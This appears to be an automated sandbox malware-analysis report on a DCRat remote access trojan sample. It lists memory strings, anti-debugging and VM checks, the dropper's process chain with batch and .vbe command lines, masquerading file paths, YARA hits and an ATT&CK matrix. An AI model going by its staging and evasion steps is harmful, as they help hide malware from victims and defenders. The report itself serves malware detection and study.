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
                                Source: SurrogatewebSession.exe, 00000008.00000002.1740551544.000000001C098000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                Source: winlogon.exe, 0000002B.00000002.1920928319.0000000012522000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: gp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
                                Source: work.exe, 00000003.00000003.1630533570.0000000002D5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                                Source: work.exe, 00000003.00000002.1631802705.0000000002CCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#4&224f42ef&0&0@
                                Source: wscript.exe, 00000005.00000002.1664665110.0000000002D6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef
                                Source: SurrogatewebSession.exe, 00000008.00000002.1740585685.000000001C0B9000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000027.00000002.1785246422.000001FA32E09000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeAPI call chain: ExitProcess graph end nodegraph_0-24539
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeAPI call chain: ExitProcess graph end nodegraph_3-24395
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeAPI call chain: ExitProcess graph end nodegraph_4-24904
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A40A0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A40A0A
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A491B0 mov eax, dword ptr fs:[00000030h]0_2_00A491B0
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_003391B0 mov eax, dword ptr fs:[00000030h]3_2_003391B0
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_00747DEE mov eax, dword ptr fs:[00000030h]4_2_00747DEE
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A4D1F0 GetProcessHeap,0_2_00A4D1F0
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess token adjusted: Debug
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess token adjusted: Debug
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess token adjusted: Debug
                                Source: C:\Recovery\winlogon.exeProcess token adjusted: Debug
                                Source: C:\Recovery\winlogon.exeProcess token adjusted: Debug
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess token adjusted: Debug
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A40A0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A40A0A
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A40B9D SetUnhandledExceptionFilter,0_2_00A40B9D
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A40D8A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00A40D8A
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A44FEF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A44FEF
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_00330A0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00330A0A
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_00330B9D SetUnhandledExceptionFilter,3_2_00330B9D
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_00330D8A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00330D8A
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: 3_2_00334FEF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00334FEF
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_0073F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0073F838
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_0073F9D5 SetUnhandledExceptionFilter,4_2_0073F9D5
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_0073FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0073FBCA
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: 4_2_00748EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00748EBD
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeMemory allocated: page read and write | page guardJump to behavior

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                .NET source code references suspicious native API functions
                                Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Class73.csReference to suspicious API methods: A86.VirtualProtect(intPtr, (UIntPtr)(ulong)num, A86.OkN.flag_2, out var okN_)
                                Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Class74.csReference to suspicious API methods: A86.GetProcAddress(A86.GetModuleHandle(string_0), string_1)
                                Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, AFA.csReference to suspicious API methods: A86.VirtualAlloc(intPtr3, (IntPtr)uint_0, A86.U14.flag_0 | A86.U14.flag_1, A86.OkN.flag_2)
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe work.exe -priverdDJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe "C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe" Jump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\msBroker\2lT5LH2HofMC1aCPgzVrsLj8Fs1JHh.bat" "Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe "C:\Users\user\AppData\Roaming\msBroker/SurrogatewebSession.exe"Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline"Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NZDl7DWO67.bat" Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41D7.tmp" "c:\Windows\System32\CSCD00016AF5F994D2B979CA07EFAA630F3.TMP"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe "C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A3BEFF SetEntriesInAclW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateDirectoryW,LocalFree,0_2_00A3BEFF
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A40826 cpuid 0_2_00A40826
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00A3C093
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: GetLocaleInfoW,GetNumberFormatW,3_2_0032C093
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: GetLocaleInfoW,GetNumberFormatW,4_2_0073AF0F
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeQueries volume information: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeQueries volume information: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe VolumeInformation
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeQueries volume information: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeQueries volume information: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeQueries volume information: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe VolumeInformation
                                Source: C:\Recovery\winlogon.exeQueries volume information: C:\Recovery\winlogon.exe VolumeInformation
                                Source: C:\Recovery\winlogon.exeQueries volume information: C:\Recovery\winlogon.exe VolumeInformation
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeQueries volume information: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe VolumeInformation
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeQueries volume information: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe VolumeInformation
                                Source: C:\Recovery\winlogon.exeQueries volume information: C:\Recovery\winlogon.exe VolumeInformation
                                Source: C:\Recovery\winlogon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A3F05C GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00A3F05C
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A2C365 GetVersionExW,0_2_00A2C365
                                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                Stealing of Sensitive Information

                                barindex
                                Yara detected DCRat
                                Source: Yara matchFile source: 8.0.SurrogatewebSession.exe.bc0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.3.dwartg.exe.70006d6.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.3.dwartg.exe.70006d6.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.3.dwartg.exe.66f46d6.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000008.00000000.1663208372.0000000000BC2000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000003.1624273489.0000000006FB2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000003.1624823463.0000000004F0D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000003.1623801206.00000000066A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.1620690565.0000000004F96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: work.exe PID: 7588, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: dwartg.exe PID: 7628, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: SurrogatewebSession.exe PID: 7784, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Recovery\winlogon.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe, type: DROPPED

                                Remote Access Functionality

                                barindex
                                Yara detected DCRat
                                Source: Yara matchFile source: 8.0.SurrogatewebSession.exe.bc0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.3.dwartg.exe.70006d6.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.3.dwartg.exe.70006d6.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.3.dwartg.exe.66f46d6.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000008.00000000.1663208372.0000000000BC2000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000003.1624273489.0000000006FB2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000003.1624823463.0000000004F0D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000003.1623801206.00000000066A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.1620690565.0000000004F96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: work.exe PID: 7588, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: dwartg.exe PID: 7628, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: SurrogatewebSession.exe PID: 7784, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Recovery\winlogon.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe, type: DROPPED

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information11
                                Scripting                                		Valid Accounts11
                                Windows Management Instrumentation                                		11
                                Scripting                                		1
                                DLL Side-Loading                                		1
                                Disable or Modify Tools                                		OS Credential Dumping1
                                System Time Discovery                                		1
                                Taint Shared Content                                		11
                                Archive Collected Data                                		1
                                Web Service                                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                CredentialsDomainsDefault Accounts12
                                Native API                                		1
                                DLL Side-Loading                                		11
                                Process Injection                                		11
                                Deobfuscate/Decode Files or Information                                		LSASS Memory3
                                File and Directory Discovery                                		Remote Desktop ProtocolData from Removable Media1
                                Ingress Tool Transfer                                		Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts2
                                Command and Scripting Interpreter                                		1
                                Scheduled Task/Job                                		1
                                Scheduled Task/Job                                		21
                                Obfuscated Files or Information                                		Security Account Manager37
                                System Information Discovery                                		SMB/Windows Admin SharesData from Network Shared Drive11
                                Encrypted Channel                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts1
                                Scheduled Task/Job                                		21
                                Registry Run Keys / Startup Folder                                		21
                                Registry Run Keys / Startup Folder                                		11
                                Software Packing                                		NTDS121
                                Security Software Discovery                                		Distributed Component Object ModelInput Capture3
                                Non-Application Layer Protocol                                		Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                DLL Side-Loading                                		LSA Secrets1
                                Process Discovery                                		SSHKeylogging4
                                Application Layer Protocol                                		Scheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                File Deletion                                		Cached Domain Credentials31
                                Virtualization/Sandbox Evasion                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items33
                                Masquerading                                		DCSync1
                                Application Window Discovery                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                                Virtualization/Sandbox Evasion                                		Proc Filesystem1
                                System Network Configuration Discovery                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                                Process Injection                                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
